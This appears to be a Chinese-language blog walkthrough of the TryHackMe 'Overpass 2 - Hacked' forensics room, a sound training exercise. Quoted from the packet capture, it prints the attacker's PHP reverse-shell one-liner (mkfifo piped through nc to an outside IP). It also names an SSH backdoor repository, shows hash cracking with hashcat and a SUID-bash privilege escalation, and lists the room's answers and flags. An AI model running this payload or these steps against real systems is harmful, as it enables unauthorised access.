tryhackme--Overpass 2 - Hacked
tryhackme--Overpass 2 - Hacked
- Task 1 -Forensics - Analyse the PCAP
- #1 What was the URL of the page they used to upload a reverse shell?
- #2 What payload did the attacker use to gain access?
- #3 What password did the attacker use to privesc?
- #4 How did the attacker establish persistence?
- #5 Using the fasttrack wordlist, how many of the system passwords were crackable?
- Task 2 Research - Analyse the code
- #1 What's the default hash for the backdoor?
- #2 What's the hardcoded salt for the backdoor?
- #3 What was the hash that the attacker used? - go back to the PCAP for this!
- #4 Crack the hash using rockyou and a cracking tool of your choice. What's the password?
- Task 3 Attack - Get back in!
- #1 The attacker defaced the website. What message did they leave as a heading?
- #3 What's the user flag?
- #3 What's the root flag?
- ps:
日常一篇博客~~~~
今天分享的是tryhackme的一道取证题。
Task 1 -Forensics - Analyse the PCAP
#1 What was the URL of the page they used to upload a reverse shell?
查看http数据包,我们从请求和响应可以知道攻击者的ip:192.168.170.145,服务器的ip:192.168.170.159,并且/development/目录上还有一个upload.php,故答案
/development/
#2 What payload did the attacker use to gain access?
搜索关键字符,发现payload.php,TCP追踪流查看具体发包数据
攻击者利用upload.php新上传了一个payload.php,从内容上看是一个反弹shell
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
#3 What password did the attacker use to privesc?
继续查看该payload执行了什么命令,TCP追踪流,
该用户从www切换到james用户,密码为:
whenevernoteartinstant
#4 How did the attacker establish persistence?
继续查看攻击者的攻击命令,发现james可以以任何用户执行任何命令,这个属于配置上的错误。往下看攻击者先是看了/etc/passwd文件,再从github上面下载了一个ssh后门并安装执行。
https://github.com/NinjaJc01/ssh-backdoor
#5 Using the fasttrack wordlist, how many of the system passwords were crackable?
该服务器一共有5个用户,攻击者现在已经知道james用户的密码,只需破解剩下四个用户的密码即可,在kali使用john爆破也可以。
4
Task 2 Research - Analyse the code
#1 What’s the default hash for the backdoor?
查看mian.go
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3
#2 What’s the hardcoded salt for the backdoor?
求该hash算法的盐
1c362db832f3f864c8c2fe05f2002a05
#3 What was the hash that the attacker used? - go back to the PCAP for this!
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
#4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?
通过算法我们可以知道密码加盐加密成hash,即
SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed'
接下来我们用hashcat爆破密码
november16
Task 3 Attack - Get back in!
#1 The attacker defaced the website. What message did they leave as a heading?
访问http服务
H4ck3d by CooctusClan
#3 What’s the user flag?
用ssh后门登录服务器,在james在家目录找到user.txt
thm{d119b4fa8c497ddb0525f7ad200e6567}
#3 What’s the root flag?
发现一个可疑的suid文件,/home/james/.suid_bash
bash命令的提权方法,不过这个是二进制文件直接执行就好了。
执行拿到flag
thm{d53b2684f169360bb9606c333873144d}
ps:
个人站点博客:XingHe,欢迎来踩~
tryhackme--Overpass 2 - Hacked相关推荐
- Tryhackme-Advanced Exploitation
Advanced Exploitation 文章目录 Advanced Exploitation Daily Bugle Task1 Deploy Task2 Obtain user and root ...
- Commonly Hacked Ports
2019独角兽企业重金招聘Python工程师标准>>> Commonly Hacked Ports Related Book Hacking For Dummies, 5th Edi ...
- How I Hacked 40 Websites in 7 minutes
Last summer I started learning about information security and hacking. Over the last year I've playe ...
- Hacked【黑客】手游攻略
目录 Chapter 1 The Hackpad Increment me Positive Absolute Absolute2 Chapter 2 High School Hack Power P ...
- Hacked Exam-Google Codejam 2021 Round 1A
Hacked Exam-Google Codejam 2021 Round 1A第三题 There is an exam with Q(1 ≤\leq≤ Q ≤\leq≤ 120)true or fa ...
- Hacked?软件监控邮箱账号是否存在数据泄露情况
"Hacked?"是Windows 10 PC/Mobile的一款新软件,它可以帮助用户监控其网络账号是否存在数据泄露的情况.该软件利用Have I been pwned?的API ...
- Hacked by 1BYTE
偶然发现IE的窗口标题 不知道什么时候在后面被加了个"Hacked by 1BYTE",晕 在网上找了找没找到什么,好不容易有个space上好像是说这个的,但是不是中文也不是英文, ...
- xbox360 corona hacked, RGH3成功破解corona
*** mr_evil joined #RGH3 http://www.team-xecuter.com/forums/showthread.php?t=89096 Topic set by k3rn ...
- Kernel.org hacked – how to get Android repo?
最近下载android源码报错误如下: curl: (7) couldn't connect to host和 [text] view plaincopy root@localhost WORKING ...
最新文章
- C++中模板template typename T
- windows常用命令有哪些(整理)
- ux设计_从UX设计人员的角度来看Microsoft Build 2018
- MongoDB 5.0 来了,原生时序、版本化 API 新特性悉数登场
- python代码怎么变成软件_Python变成技术
- 前端之旅,做一点有回报的事情
- 【软件质量】软件可维护性
- bagging和时间序列预测_时间序列多步预测的五种策略
- Spring AOP(二)之AfterReturning增强处理
- ctf杂项各类编码汇总
- 硬盘功率测试软件,CPU功耗检测
- redis数据更新操作
- html input文字缩进,使用HTML Tidy来缩进HTML代码?
- 大数据的价值可以体现在哪些方面?
- android 373dpi对应的布局,[荣耀6X BLN-AL10] EMUI5.0 B373 自定义DPI 来电闪光 接听 录音 核心控制 性能调节 游戏模式 稳定精简顺畅等...
- XPosed及插件安装(解决下载http://dl.xposed.info/repo/full.xml.gz时出错的问题)
- 如何退出UC浏览器登录账号
- bzoj4768: wxh loves substring //后缀平衡树
- APP支付之使用ApplePay支付开发步骤
- 从陶潜的“化”到王维的“空”